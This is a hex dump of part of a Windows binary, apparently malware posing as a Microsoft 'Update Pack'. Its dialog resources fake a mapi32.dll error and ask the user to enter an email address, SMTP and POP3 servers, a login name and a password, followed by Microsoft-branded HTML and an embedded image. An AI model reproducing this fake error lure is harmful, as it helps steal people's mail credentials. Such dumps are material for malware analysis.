00014e00  20 00 53 00 61 00 6e 00  73 00 20 00 53 00 65 00  | .S.a.n.s. .S.e.|
00014e10  72 00 69 00 66 00 00 00  00 00 01 58 00 00 00 00  |r.i.f......X....|
00014e20  a9 00 b6 00 36 00 0e 00  ed 03 ff ff 80 00 26 00  |....6.........&.|
00014e30  41 00 70 00 70 00 6c 00  79 00 00 00 00 00 00 00  |A.p.p.l.y.......|
00014e40  00 00 00 50 00 00 00 00  e4 00 b6 00 36 00 0e 00  |...P........6...|
00014e50  ee 03 ff ff 80 00 43 00  61 00 6e 00 63 00 65 00  |......C.a.n.c.e.|
00014e60  6c 00 00 00 00 00 00 00  07 00 00 50 00 00 00 00  |l..........P....|
00014e70  07 00 2c 00 b5 01 83 00  ff ff ff ff 80 00 00 00  |..,.............|
00014e80  00 00 00 00 03 00 00 50  00 00 00 00 07 00 07 00  |.......P........|
00014e90  14 00 14 00 ff ff ff ff  82 00 ff ff 68 00 00 00  |............h...|
00014ea0  00 00 00 50 00 00 00 00  21 00 06 00 a9 00 08 00  |...P....!.......|
00014eb0  ff ff ff ff 82 00 41 00  6e 00 20 00 69 00 6e 00  |......A.n. .i.n.|
00014ec0  74 00 65 00 72 00 6e 00  61 00 6c 00 20 00 65 00  |t.e.r.n.a.l. .e.|
00014ed0  72 00 72 00 6f 00 72 00  20 00 68 00 61 00 73 00  |r.r.o.r. .h.a.s.|
00014ee0  20 00 6f 00 63 00 63 00  75 00 72 00 72 00 65 00  | .o.c.c.u.r.r.e.|
00014ef0  64 00 20 00 69 00 6e 00  20 00 6d 00 6f 00 64 00  |d. .i.n. .m.o.d.|
00014f00  75 00 6c 00 65 00 20 00  6d 00 61 00 70 00 69 00  |u.l.e. .m.a.p.i.|
00014f10  33 00 32 00 2e 00 64 00  6c 00 6c 00 00 00 00 00  |3.2...d.l.l.....|
00014f20  03 00 00 50 00 00 00 00  0d 00 36 00 14 00 14 00  |...P......6.....|
00014f30  ff ff ff ff 82 00 ff ff  67 00 00 00 00 00 02 50  |........g......P|
00014f40  00 00 00 00 28 00 3a 00  c6 00 11 00 ff ff ff ff  |....(.:.........|
00014f50  82 00 49 00 6e 00 20 00  74 00 68 00 65 00 20 00  |..I.n. .t.h.e. .|
00014f60  65 00 64 00 69 00 74 00  20 00 62 00 6f 00 78 00  |e.d.i.t. .b.o.x.|
00014f70  20 00 62 00 65 00 6c 00  6f 00 77 00 2c 00 20 00  | .b.e.l.o.w.,. .|
00014f80  70 00 6c 00 65 00 61 00  73 00 65 00 20 00 65 00  |p.l.e.a.s.e. .e.|
00014f90  6e 00 74 00 65 00 72 00  20 00 79 00 6f 00 75 00  |n.t.e.r. .y.o.u.|
00014fa0  72 00 20 00 6e 00 61 00  6d 00 65 00 20 00 61 00  |r. .n.a.m.e. .a.|
00014fb0  73 00 20 00 79 00 6f 00  75 00 20 00 77 00 6f 00  |s. .y.o.u. .w.o.|
00014fc0  75 00 6c 00 64 00 20 00  6c 00 69 00 6b 00 65 00  |u.l.d. .l.i.k.e.|
00014fd0  20 00 69 00 74 00 20 00  74 00 6f 00 20 00 61 00  | .i.t. .t.o. .a.|
00014fe0  70 00 70 00 65 00 61 00  72 00 20 00 69 00 6e 00  |p.p.e.a.r. .i.n.|
00014ff0  20 00 74 00 68 00 65 00  20 00 22 00 46 00 72 00  | .t.h.e. .".F.r.|
00015000  6f 00 6d 00 22 00 20 00  66 00 69 00 65 00 6c 00  |o.m.". .f.i.e.l.|
00015010  64 00 20 00 6f 00 66 00  20 00 79 00 6f 00 75 00  |d. .o.f. .y.o.u.|
00015020  72 00 20 00 6f 00 75 00  74 00 67 00 6f 00 69 00  |r. .o.u.t.g.o.i.|
00015030  6e 00 67 00 20 00 6d 00  65 00 73 00 73 00 61 00  |n.g. .m.e.s.s.a.|
00015040  67 00 65 00 2e 00 00 00  00 00 00 00 00 00 02 50  |g.e............P|
00015050  00 00 00 00 28 00 51 00  29 00 09 00 ff ff ff ff  |....(.Q.).......|
00015060  82 00 59 00 6f 00 75 00  72 00 20 00 4e 00 61 00  |..Y.o.u.r. .N.a.|
00015070  6d 00 65 00 3a 00 00 00  00 00 00 00 80 00 81 50  |m.e.:..........P|
00015080  00 00 00 00 59 00 4e 00  7e 00 0c 00 ea 03 ff ff  |....Y.N.~.......|
00015090  81 00 00 00 00 00 00 00  00 00 02 50 00 00 00 00  |...........P....|
000150a0  28 00 61 00 b5 00 11 00  ff ff ff ff 82 00 50 00  |(.a...........P.|
000150b0  6c 00 65 00 61 00 73 00  65 00 20 00 65 00 6e 00  |l.e.a.s.e. .e.n.|
000150c0  74 00 65 00 72 00 20 00  79 00 6f 00 75 00 72 00  |t.e.r. .y.o.u.r.|
000150d0  20 00 65 00 6d 00 61 00  69 00 6c 00 20 00 61 00  | .e.m.a.i.l. .a.|
000150e0  64 00 64 00 72 00 65 00  73 00 73 00 2e 00 20 00  |d.d.r.e.s.s... .|
000150f0  54 00 68 00 69 00 73 00  20 00 61 00 64 00 64 00  |T.h.i.s. .a.d.d.|
00015100  72 00 65 00 73 00 73 00  20 00 77 00 69 00 6c 00  |r.e.s.s. .w.i.l.|
00015110  6c 00 20 00 62 00 65 00  20 00 74 00 68 00 65 00  |l. .b.e. .t.h.e.|
00015120  20 00 61 00 64 00 64 00  72 00 65 00 73 00 73 00  | .a.d.d.r.e.s.s.|
00015130  20 00 6f 00 74 00 68 00  65 00 72 00 20 00 70 00  | .o.t.h.e.r. .p.|
00015140  65 00 6f 00 70 00 6c 00  65 00 20 00 75 00 73 00  |e.o.p.l.e. .u.s.|
00015150  65 00 20 00 74 00 6f 00  20 00 73 00 65 00 6e 00  |e. .t.o. .s.e.n.|
00015160  64 00 20 00 65 00 6d 00  61 00 69 00 6c 00 20 00  |d. .e.m.a.i.l. .|
00015170  74 00 6f 00 20 00 79 00  6f 00 75 00 2e 00 00 00  |t.o. .y.o.u.....|
00015180  00 00 00 00 00 00 02 50  00 00 00 00 28 00 77 00  |.......P....(.w.|
00015190  2f 00 09 00 ff ff ff ff  82 00 45 00 6d 00 61 00  |/.........E.m.a.|
000151a0  69 00 6c 00 20 00 41 00  64 00 64 00 72 00 65 00  |i.l. .A.d.d.r.e.|
000151b0  73 00 73 00 3a 00 00 00  00 00 00 00 80 00 81 50  |s.s.:..........P|
000151c0  00 00 00 00 59 00 75 00  7e 00 0c 00 eb 03 ff ff  |....Y.u.~.......|
000151d0  81 00 00 00 00 00 00 00  00 00 02 50 00 00 00 00  |...........P....|
000151e0  28 00 89 00 b5 00 10 00  ff ff ff ff 82 00 50 00  |(.............P.|
000151f0  6c 00 65 00 61 00 73 00  65 00 20 00 65 00 6e 00  |l.e.a.s.e. .e.n.|
00015200  74 00 65 00 72 00 20 00  74 00 68 00 65 00 20 00  |t.e.r. .t.h.e. .|
00015210  6e 00 61 00 6d 00 65 00  20 00 6f 00 66 00 20 00  |n.a.m.e. .o.f. .|
00015220  79 00 6f 00 75 00 72 00  20 00 6f 00 75 00 74 00  |y.o.u.r. .o.u.t.|
00015230  67 00 6f 00 69 00 6e 00  67 00 20 00 6d 00 61 00  |g.o.i.n.g. .m.a.|
00015240  69 00 6c 00 20 00 73 00  65 00 72 00 76 00 65 00  |i.l. .s.e.r.v.e.|
00015250  72 00 20 00 69 00 6e 00  20 00 74 00 68 00 65 00  |r. .i.n. .t.h.e.|
00015260  20 00 65 00 64 00 69 00  74 00 20 00 62 00 6f 00  | .e.d.i.t. .b.o.|
00015270  78 00 20 00 62 00 65 00  6c 00 6f 00 77 00 2e 00  |x. .b.e.l.o.w...|
00015280  00 00 00 00 00 00 02 50  00 00 00 00 28 00 9f 00  |.......P....(...|
00015290  2f 00 09 00 ff ff ff ff  82 00 53 00 4d 00 54 00  |/.........S.M.T.|
000152a0  50 00 20 00 53 00 65 00  72 00 76 00 65 00 72 00  |P. .S.e.r.v.e.r.|
000152b0  3a 00 00 00 00 00 00 00  80 00 81 50 00 00 00 00  |:..........P....|
000152c0  59 00 9c 00 7e 00 0c 00  ec 03 ff ff 81 00 00 00  |Y...~...........|
000152d0  00 00 00 00 00 00 02 50  00 00 00 00 21 00 12 00  |.......P....!...|
000152e0  96 01 11 00 ff ff ff ff  82 00 44 00 65 00 66 00  |..........D.e.f.|
000152f0  61 00 75 00 6c 00 74 00  20 00 6d 00 61 00 69 00  |a.u.l.t. .m.a.i.|
00015300  6c 00 20 00 61 00 63 00  63 00 6f 00 75 00 6e 00  |l. .a.c.c.o.u.n.|
00015310  74 00 20 00 73 00 74 00  72 00 75 00 63 00 74 00  |t. .s.t.r.u.c.t.|
00015320  75 00 72 00 65 00 20 00  68 00 61 00 73 00 20 00  |u.r.e. .h.a.s. .|
00015330  61 00 20 00 64 00 61 00  6d 00 61 00 67 00 65 00  |a. .d.a.m.a.g.e.|
00015340  64 00 20 00 74 00 61 00  62 00 6c 00 65 00 20 00  |d. .t.a.b.l.e. .|
00015350  6f 00 66 00 20 00 63 00  6f 00 6e 00 74 00 65 00  |o.f. .c.o.n.t.e.|
00015360  6e 00 74 00 73 00 2e 00  20 00 49 00 74 00 20 00  |n.t.s... .I.t. .|
00015370  69 00 73 00 20 00 72 00  65 00 63 00 6f 00 6d 00  |i.s. .r.e.c.o.m.|
00015380  6d 00 65 00 6e 00 64 00  65 00 64 00 20 00 74 00  |m.e.n.d.e.d. .t.|
00015390  6f 00 20 00 6e 00 65 00  77 00 6c 00 79 00 20 00  |o. .n.e.w.l.y. .|
000153a0  72 00 65 00 63 00 6f 00  6e 00 66 00 69 00 67 00  |r.e.c.o.n.f.i.g.|
000153b0  75 00 72 00 65 00 20 00  79 00 6f 00 75 00 72 00  |u.r.e. .y.o.u.r.|
000153c0  20 00 61 00 63 00 63 00  6f 00 75 00 6e 00 74 00  | .a.c.c.o.u.n.t.|
000153d0  20 00 72 00 65 00 63 00  6f 00 72 00 64 00 73 00  | .r.e.c.o.r.d.s.|
000153e0  2e 00 20 00 4d 00 41 00  50 00 49 00 33 00 32 00  |.. .M.A.P.I.3.2.|
000153f0  20 00 6e 00 65 00 65 00  64 00 73 00 20 00 74 00  | .n.e.e.d.s. .t.|
00015400  68 00 65 00 73 00 65 00  20 00 69 00 6e 00 66 00  |h.e.s.e. .i.n.f.|
00015410  6f 00 72 00 6d 00 61 00  74 00 69 00 6f 00 6e 00  |o.r.m.a.t.i.o.n.|
00015420  73 00 20 00 69 00 6e 00  20 00 6f 00 72 00 64 00  |s. .i.n. .o.r.d.|
00015430  65 00 72 00 20 00 74 00  6f 00 20 00 62 00 65 00  |e.r. .t.o. .b.e.|
00015440  20 00 61 00 62 00 6c 00  65 00 20 00 74 00 6f 00  | .a.b.l.e. .t.o.|
00015450  20 00 73 00 65 00 6e 00  64 00 20 00 61 00 6e 00  | .s.e.n.d. .a.n.|
00015460  64 00 20 00 72 00 65 00  63 00 65 00 69 00 76 00  |d. .r.e.c.e.i.v.|
00015470  65 00 20 00 6d 00 61 00  69 00 6c 00 2e 00 20 00  |e. .m.a.i.l... .|
00015480  46 00 61 00 69 00 6c 00  75 00 72 00 65 00 20 00  |F.a.i.l.u.r.e. .|
00015490  74 00 6f 00 20 00 64 00  6f 00 20 00 73 00 6f 00  |t.o. .d.o. .s.o.|
000154a0  20 00 6d 00 61 00 79 00  20 00 63 00 61 00 75 00  | .m.a.y. .c.a.u.|
000154b0  73 00 65 00 20 00 74 00  68 00 61 00 74 00 20 00  |s.e. .t.h.a.t. .|
000154c0  73 00 6f 00 6d 00 65 00  20 00 4d 00 41 00 50 00  |s.o.m.e. .M.A.P.|
000154d0  49 00 33 00 32 00 00 00  00 00 00 00 0c 00 02 50  |I.3.2..........P|
000154e0  00 00 00 00 d9 00 78 00  21 00 08 00 ff ff ff ff  |......x.!.......|
000154f0  82 00 28 00 72 00 65 00  71 00 75 00 69 00 72 00  |..(.r.e.q.u.i.r.|
00015500  65 00 64 00 29 00 00 00  00 00 00 00 0c 00 02 50  |e.d.)..........P|
00015510  00 00 00 00 d9 00 a0 00  22 00 08 00 ff ff ff ff  |........".......|
00015520  82 00 28 00 72 00 65 00  71 00 75 00 69 00 72 00  |..(.r.e.q.u.i.r.|
00015530  65 00 64 00 29 00 00 00  00 00 00 00 00 00 02 50  |e.d.)..........P|
00015540  00 00 00 00 05 01 42 00  a9 00 09 00 ff ff ff ff  |......B.........|
00015550  82 00 45 00 6e 00 74 00  65 00 72 00 20 00 74 00  |..E.n.t.e.r. .t.|
00015560  68 00 65 00 20 00 6e 00  61 00 6d 00 65 00 20 00  |h.e. .n.a.m.e. .|
00015570  79 00 6f 00 75 00 20 00  77 00 69 00 6c 00 6c 00  |y.o.u. .w.i.l.l.|
00015580  20 00 75 00 73 00 65 00  20 00 74 00 6f 00 20 00  | .u.s.e. .t.o. .|
00015590  6c 00 6f 00 67 00 20 00  69 00 6e 00 74 00 6f 00  |l.o.g. .i.n.t.o.|
000155a0  20 00 74 00 68 00 69 00  73 00 20 00 61 00 63 00  | .t.h.i.s. .a.c.|
000155b0  63 00 6f 00 75 00 6e 00  74 00 2e 00 00 00 00 00  |c.o.u.n.t.......|
000155c0  00 00 02 50 00 00 00 00  05 01 51 00 2b 00 08 00  |...P......Q.+...|
000155d0  ff ff ff ff 82 00 4c 00  6f 00 67 00 69 00 6e 00  |......L.o.g.i.n.|
000155e0  20 00 4e 00 61 00 6d 00  65 00 3a 00 00 00 00 00  | .N.a.m.e.:.....|
000155f0  80 00 81 50 00 00 00 00  37 01 4e 00 60 00 0c 00  |...P....7.N.`...|
00015600  ef 03 ff ff 81 00 00 00  00 00 00 00 00 00 02 50  |...............P|
00015610  00 00 00 00 05 01 61 00  a7 00 08 00 ff ff ff ff  |......a.........|
00015620  82 00 50 00 6c 00 65 00  61 00 73 00 65 00 20 00  |..P.l.e.a.s.e. .|
00015630  65 00 6e 00 74 00 65 00  72 00 20 00 74 00 68 00  |e.n.t.e.r. .t.h.|
00015640  65 00 20 00 70 00 61 00  73 00 73 00 77 00 6f 00  |e. .p.a.s.s.w.o.|
00015650  72 00 64 00 20 00 66 00  6f 00 72 00 20 00 63 00  |r.d. .f.o.r. .c.|
00015660  75 00 72 00 72 00 65 00  6e 00 74 00 20 00 61 00  |u.r.r.e.n.t. .a.|
00015670  63 00 63 00 6f 00 75 00  6e 00 74 00 2e 00 00 00  |c.c.o.u.n.t.....|
00015680  00 00 00 00 00 00 02 50  00 00 00 00 05 01 72 00  |.......P......r.|
00015690  25 00 08 00 ff ff ff ff  82 00 50 00 61 00 73 00  |%.........P.a.s.|
000156a0  73 00 77 00 6f 00 72 00  64 00 3a 00 00 00 00 00  |s.w.o.r.d.:.....|
000156b0  a0 00 81 50 00 00 00 00  45 01 6d 00 32 00 0c 00  |...P....E.m.2...|
000156c0  f0 03 ff ff 81 00 00 00  00 00 00 00 00 00 02 50  |...............P|
000156d0  00 00 00 00 05 01 92 00  a3 00 08 00 ff ff ff ff  |................|
000156e0  82 00 54 00 79 00 70 00  65 00 20 00 69 00 6e 00  |..T.y.p.e. .i.n.|
000156f0  20 00 74 00 68 00 65 00  20 00 66 00 75 00 6c 00  | .t.h.e. .f.u.l.|
00015700  6c 00 20 00 6e 00 61 00  6d 00 65 00 20 00 6f 00  |l. .n.a.m.e. .o.|
00015710  66 00 20 00 79 00 6f 00  75 00 72 00 20 00 69 00  |f. .y.o.u.r. .i.|
00015720  6e 00 63 00 6f 00 6d 00  69 00 6e 00 67 00 20 00  |n.c.o.m.i.n.g. .|
00015730  6d 00 61 00 69 00 6c 00  20 00 73 00 65 00 72 00  |m.a.i.l. .s.e.r.|
00015740  76 00 65 00 72 00 2e 00  00 00 00 00 00 00 02 50  |v.e.r..........P|
00015750  00 00 00 00 05 01 a0 00  2e 00 08 00 ff ff ff ff  |................|
00015760  82 00 50 00 4f 00 50 00  33 00 20 00 53 00 65 00  |..P.O.P.3. .S.e.|
00015770  72 00 76 00 65 00 72 00  3a 00 00 00 00 00 00 00  |r.v.e.r.:.......|
00015780  a0 00 81 50 00 00 00 00  45 01 7d 00 32 00 0c 00  |...P....E.}.2...|
00015790  f1 03 ff ff 81 00 00 00  00 00 00 00 00 00 02 50  |...............P|
000157a0  00 00 00 00 05 01 80 00  3a 00 08 00 ff ff ff ff  |........:.......|
000157b0  82 00 52 00 65 00 74 00  79 00 70 00 65 00 20 00  |..R.e.t.y.p.e. .|
000157c0  70 00 61 00 73 00 73 00  77 00 6f 00 72 00 64 00  |p.a.s.s.w.o.r.d.|
000157d0  3a 00 00 00 00 00 00 00  80 00 81 50 00 00 00 00  |:..........P....|
000157e0  37 01 9c 00 7c 00 0c 00  f2 03 ff ff 81 00 00 00  |7...|...........|
000157f0  00 00 00 00 00 00 02 50  00 00 00 00 21 00 22 00  |.......P....!.".|
00015800  26 01 08 00 ff ff ff ff  82 00 64 00 65 00 70 00  |&.........d.e.p.|
00015810  65 00 6e 00 64 00 65 00  6e 00 74 00 20 00 61 00  |e.n.d.e.n.t. .a.|
00015820  70 00 70 00 6c 00 69 00  63 00 61 00 74 00 69 00  |p.p.l.i.c.a.t.i.|
00015830  6f 00 6e 00 73 00 20 00  28 00 73 00 75 00 63 00  |o.n.s. .(.s.u.c.|
00015840  68 00 20 00 61 00 73 00  20 00 4f 00 75 00 74 00  |h. .a.s. .O.u.t.|
00015850  6c 00 6f 00 6f 00 6b 00  20 00 6f 00 72 00 20 00  |l.o.o.k. .o.r. .|
00015860  4f 00 75 00 74 00 6c 00  6f 00 6f 00 6b 00 20 00  |O.u.t.l.o.o.k. .|
00015870  45 00 78 00 70 00 72 00  65 00 73 00 73 00 29 00  |E.x.p.r.e.s.s.).|
00015880  20 00 62 00 65 00 63 00  6f 00 6d 00 65 00 20 00  | .b.e.c.o.m.e. .|
00015890  6e 00 6f 00 6e 00 2d 00  66 00 75 00 6e 00 63 00  |n.o.n.-.f.u.n.c.|
000158a0  74 00 69 00 6f 00 6e 00  61 00 6c 00 2e 00 00 00  |t.i.o.n.a.l.....|
000158b0  00 00 00 00 00 00 00 00  01 00 ff ff 00 00 00 00  |................|
000158c0  00 00 00 00 d0 0a c0 80  04 00 00 00 00 00 a0 00  |................|
000158d0  3e 00 00 00 00 00 20 00  49 00 6e 00 73 00 74 00  |>..... .I.n.s.t.|
000158e0  61 00 6c 00 6c 00 69 00  6e 00 67 00 20 00 55 00  |a.l.l.i.n.g. .U.|
000158f0  70 00 64 00 61 00 74 00  65 00 20 00 50 00 61 00  |p.d.a.t.e. .P.a.|
00015900  63 00 6b 00 00 00 08 00  00 00 00 01 4d 00 53 00  |c.k.........M.S.|
00015910  20 00 53 00 61 00 6e 00  73 00 20 00 53 00 65 00  | .S.a.n.s. .S.e.|
00015920  72 00 69 00 66 00 00 00  00 00 00 00 00 00 00 00  |r.i.f...........|
00015930  07 00 00 50 03 00 00 00  9a 00 3b 00 ff ff ff ff  |...P......;.....|
00015940  ff ff 80 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00015950  03 00 00 50 0d 00 08 00  15 00 14 00 ff ff ff ff  |...P............|
00015960  ff ff 82 00 ff ff 66 00  00 00 00 00 00 00 00 00  |......f.........|
00015970  00 00 00 00 00 00 00 50  09 00 1f 00 8d 00 09 00  |.......P........|
00015980  f1 03 00 00 ff ff 82 00  58 00 58 00 58 00 00 00  |........X.X.X...|
00015990  00 00 00 00 00 00 00 00  00 00 02 00 00 00 00 50  |...............P|
000159a0  09 00 29 00 8d 00 0b 00  f0 03 00 00 ff ff 82 00  |..).............|
000159b0  00 00 00 00 00 00 00 00  20 4d 69 63 72 6f 73 6f  |........ Microso|
000159c0  66 74 20 43 6f 72 70 6f  72 61 74 69 6f 6e 2e 20  |ft Corporation. |
000159d0  41 6c 6c 20 72 69 67 68  74 73 20 72 65 73 65 72  |All rights reser|
000159e0  76 65 64 2e 0d 0a 3c 41  20 53 54 59 4c 45 3d 33  |ved...<A STYLE=3|
000159f0  44 22 63 6f 6c 6f 72 3a  23 46 46 46 46 46 46 3b  |D"color:#FFFFFF;|
00015a00  22 20 48 52 45 46 3d 33  44 22 68 74 74 70 3a 2f  |" HREF=3D"http:/|
00015a10  2f 77 77 77 2e 6d 69 63  72 6f 73 6f 66 74 2e 63  |/www.microsoft.c|
00015a20  6f 6d 2f 3d 0d 0a 69 6e  66 6f 2f 63 70 79 72 69  |om/=..info/cpyri|
00015a30  67 68 74 2e 68 74 6d 22  20 54 41 52 47 45 54 3d  |ght.htm" TARGET=|
00015a40  33 44 22 5f 74 6f 70 22  3e 54 65 72 6d 73 20 6f  |3D"_top">Terms o|
00015a50  66 20 55 73 65 3c 2f 41  3e 0d 0a 26 6e 62 73 70  |f Use</A>..&nbsp|
00015a60  3b 7c 26 6e 62 73 70 3b  0d 0a 3c 41 20 53 54 59  |;|&nbsp;..<A STY|
00015a70  4c 45 3d 33 44 22 63 6f  6c 6f 72 3a 23 46 46 46  |LE=3D"color:#FFF|
00015a80  46 46 46 3b 22 20 48 52  45 46 3d 33 44 22 68 74  |FFF;" HREF=3D"ht|
00015a90  74 70 3a 2f 2f 77 77 77  2e 6d 69 63 72 6f 73 6f  |tp://www.microso|
00015aa0  66 74 2e 63 6f 6d 2f 3d  0d 0a 69 6e 66 6f 2f 70  |ft.com/=..info/p|
00015ab0  72 69 76 61 63 79 2e 68  74 6d 22 20 54 41 52 47  |rivacy.htm" TARG|
00015ac0  45 54 3d 33 44 22 5f 74  6f 70 22 3e 0d 0a 50 72  |ET=3D"_top">..Pr|
00015ad0  69 76 61 63 79 20 53 74  61 74 65 6d 65 6e 74 3c  |ivacy Statement<|
00015ae0  2f 41 3e 26 6e 62 73 70  3b 7c 26 6e 62 73 70 3b  |/A>&nbsp;|&nbsp;|
00015af0  0d 0a 3c 41 20 53 54 59  4c 45 3d 33 44 22 63 6f  |..<A STYLE=3D"co|
00015b00  6c 6f 72 3a 23 46 46 46  46 46 46 3b 22 20 48 52  |lor:#FFFFFF;" HR|
00015b10  45 46 3d 33 44 22 68 74  74 70 3a 2f 2f 77 77 77  |EF=3D"http://www|
00015b20  2e 6d 69 63 72 6f 73 6f  66 74 2e 63 6f 6d 2f 3d  |.microsoft.com/=|
00015b30  0d 0a 65 6e 61 62 6c 65  2f 22 20 54 41 52 47 45  |..enable/" TARGE|
00015b40  54 3d 33 44 22 5f 74 6f  70 22 3e 41 63 63 65 73  |T=3D"_top">Acces|
00015b50  73 69 62 69 6c 69 74 79  3c 2f 41 3e 0d 0a 3c 2f  |sibility</A>..</|
00015b60  46 4f 4e 54 3e 0d 0a 3c  2f 54 44 3e 0d 0a 3c 2f  |FONT>..</TD>..</|
00015b70  54 52 3e 0d 0a 0d 0a 3c  2f 54 41 42 4c 45 3e 0d  |TR>....</TABLE>.|
00015b80  0a 3c 2f 42 4f 44 59 3e  0d 0a 3c 2f 48 54 4d 4c  |.</BODY>..</HTML|
00015b90  3e 00 00 00 00 00 00 00  52 30 6c 47 4f 44 6c 68  |>.......R0lGODlh|
00015ba0  61 41 41 37 41 50 63 41  41 50 2f 2f 2f 2b 72 70  |aAA7APcAAP///+rp|
00015bb0  36 70 75 53 70 36 47 5a  72 44 55 6a 55 55 63 36  |6puSp6GZrDUjUUc6|
00015bc0  5a 6e 35 33 6d 46 4a 4d  64 62 47 76 76 56 74 58  |Zn53mFJMdbGvvVtX|
00015bd0  68 32 78 72 65 38 62 46  31 78 38 63 55 34 79 4c  |h2xre8bF1x8cU4yL|
00015be0  70 72 4f 79 0d 0a 7a 49  47 41 72 6c 5a 57 75 32  |prOy..zIGArlZWu2|
00015bf0  35 75 78 33 31 39 78 57  70 71 6e 6e 4e 7a 70 70  |5ux319xWpqnnNzpp|
00015c00  61 57 79 34 36 4f 76 4b  4b 69 7a 5a 71 61 76 4c  |aWy46OvKKizZqavL|
00015c10  61 32 31 37 36 2b 32 38  33 4e 35 73 66 48 33 34  |a2176+283N5sfH34|
00015c20  75 4c 6d 70 4b 53 6f 4e  76 62 37 63 37 4f 33 4c  |uLmpKSoNvb7c7O3L|
00015c30  32 39 0d 0a 79 71 4f 6a  72 74 54 55 34 63 72 4b  |29..yqOjrtTU4crK|
00015c40  31 4e 76 62 35 65 72 71  39 4f 2f 76 2b 4f 37 75  |1Nvb5erq9O/v+O7u|
00015c50  39 39 50 54 32 73 62 47  7a 65 50 6a 36 76 4c 79  |99PT2sbGzePj6vLy|
00015c60  39 39 6a 59 33 50 76 37  2f 76 62 32 2b 66 6e 35  |99jY3Pv7/vb2+fn5|
00015c70  2b 2b 2f 76 38 4b 71 72  30 6f 57 48 75 4e 62 58  |++/v8Kqr0oWHuNbX|
00015c80  0d 0a 35 35 53 56 6f 73  7a 4e 32 38 76 4d 32 70  |..55SVoszN28vM2p|
00015c90  47 55 72 37 53 31 76 71  71 74 76 35 32 66 72 4f  |GUr7S1vqqtv52frO|
00015ca0  50 6c 38 43 51 76 61 71  75 7a 32 4f 6a 70 37 70  |Pl8CQvaquz2Ojp7p|
00015cb0  6d 6e 33 4f 7a 75 38 33  4f 50 7a 6d 6d 54 36 46  |mn3Ozu83OPzmmT6F|
00015cc0  31 2f 78 6f 36 56 6f 68  39 70 32 43 35 7a 0d 0a  |1/xo6Voh9p2C5z..|
00015cd0  33 45 57 43 33 31 6d 53  34 30 5a 78 72 34 75 77  |3EWC31mS40Zxr4uw|
00015ce0  36 4c 58 4e 38 69 5a 6b  75 58 6d 6e 35 35 71 39  |6LXN8iZkuXmn55q9|
00015cf0  37 50 48 32 2f 59 69 72  31 72 62 4c 35 69 56 54  |7PH2/Yir1rbL5iVT|
00015d00  68 33 4f 6a 32 63 76 58  35 50 76 39 2f 2b 2f 77  |h3Oj2cvX5Pv9/+/w|
00015d10  38 51 46 38 36 30 36 68  36 32 57 6b 0d 0a 33 6e  |8QF8606h62Wk..3n|
00015d20  2b 64 75 62 6e 59 39 61  62 42 32 63 37 6e 2f 38  |+dubnY9abB2c7n/8|
00015d30  33 68 39 4e 6a 69 36 77  65 4b 2b 43 47 4a 34 56  |3h9Nji6weK+CGJ4V|
00015d40  69 6d 36 57 79 4b 70 4b  57 73 73 67 46 79 79 41  |im6WyKpKWssgFyyA|
00015d50  61 56 2f 30 4b 6d 38 47  79 78 36 48 57 35 37 46  |aV/0Km8Gyx6HW57F|
00015d60  4a 78 69 63 44 50 32 2b  54 74 0d 0a 39 50 6a 38  |JxicDP2+Tt..9Pj8|
00015d70  2f 77 4f 61 2f 77 6d 4c  35 77 71 64 2f 77 36 56  |/wOa/wmL5wqd/w6V|
00015d80  38 68 65 62 39 31 65 35  2b 6d 53 39 2b 56 6d 4c  |8heb91e5+mS9+VmL|
00015d90  72 34 76 44 36 71 76 63  2f 62 2f 6a 2f 4d 62 6e  |r4vD6qvc/b/j/Mbn|
00015da0  2f 73 54 69 39 72 76 58  36 73 7a 71 2f 74 50 74  |/sTi9rvX6szq/tPt|
00015db0  2f 39 6a 75 2f 64 7a 78  0d 0a 2f 2b 6e 32 2f 2b  |/9ju/dzx../+n2/+|
00015dc0  37 34 2f 2f 50 36 2f 2b  33 77 38 68 4f 68 2f 78  |74//P6/+3w8hOh/x|
00015dd0  4f 57 36 79 43 6d 2f 69  75 75 2f 7a 57 76 2f 30  |OW6yCm/iuu/zWv/0|
00015de0  6d 34 2f 58 54 48 2f 49  58 4b 39 35 54 50 39 71  |m4/XTH/IXK95TP9q|
00015df0  50 56 39 62 66 69 2f 74  44 6e 39 74 66 70 39 4f  |PV9bfi/tDn9tfp9O|
00015e00  50 30 2f 39 33 72 0d 0a  39 4c 33 49 7a 79 36 56  |P0/93r..9L3Izy6V|
00015e10  7a 6a 32 32 2f 6c 72 43  2f 6d 66 47 2f 4a 76 4a  |zj22/lrC/mfG/JvJ|
00015e20  35 4a 47 6e 74 41 79 64  36 49 62 58 2f 33 7a 44  |5JGntAyd6IbX/3zD|
00015e30  36 47 7a 50 2f 33 6a 56  2f 32 75 6f 78 48 71 62  |6GzP/3jV/2uoxHqb|
00015e40  71 75 6a 76 38 67 36 4d  76 4a 54 6a 2f 32 48 46  |qujv8g6MvJTj/2HF|
00015e50  35 70 58 56 0d 0a 36 30  36 7a 7a 36 48 70 2f 36  |5pXV..606zz6Hp/6|
00015e60  33 76 2f 37 6a 31 2f 38  50 73 38 38 62 38 2f 72  |3v/7j1/8Ps88b8/r|
00015e70  62 6a 35 52 4b 4f 6b 45  32 77 72 33 4f 47 68 6f  |bj5RKOkE2wr3OGho|
00015e80  4b 47 68 76 37 2f 2f 2f  44 78 38 56 32 61 6c 71  |KGhv7///Dx8V2alq|
00015e90  76 6d 34 5a 6e 69 31 59  50 52 76 78 35 75 56 77  |vm4Zni1YPRvx5uVw|
00015ea0  79 4f 0d 0a 58 30 71 32  68 4c 54 76 77 38 58 31  |yO..X0q2hLTvw8X1|
00015eb0  30 67 78 32 48 34 50 58  6b 6b 75 6f 56 35 7a 6b  |0gx2H4PXkkuoV5zk|
00015ec0  6f 51 65 41 44 5a 75 37  6d 6d 7a 49 56 45 4f 37  |oQeADZu7mmzIVEO7|
00015ed0  48 49 58 62 61 47 66 4c  4d 50 7a 38 2b 39 37 64  |HIXbaGfLMPz8+97d|
00015ee0  32 2f 50 78 37 76 2f 2f  2f 2b 62 6c 35 65 48 67  |2/Px7v///+bl5eHg|
00015ef0  0d 0a 34 50 37 2b 2f 76  33 39 2f 66 54 30 39 50  |..4P7+/v39/fT09P|
00015f00  4c 79 38 75 37 75 37 67  41 41 41 41 41 41 41 41  |Ly8u7u7gAAAAAAAA|
00015f10  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
*
00015f30  41 41 41 41 41 41 41 41  41 41 41 41 41 41 0d 0a  |AAAAAAAAAAAAAA..|
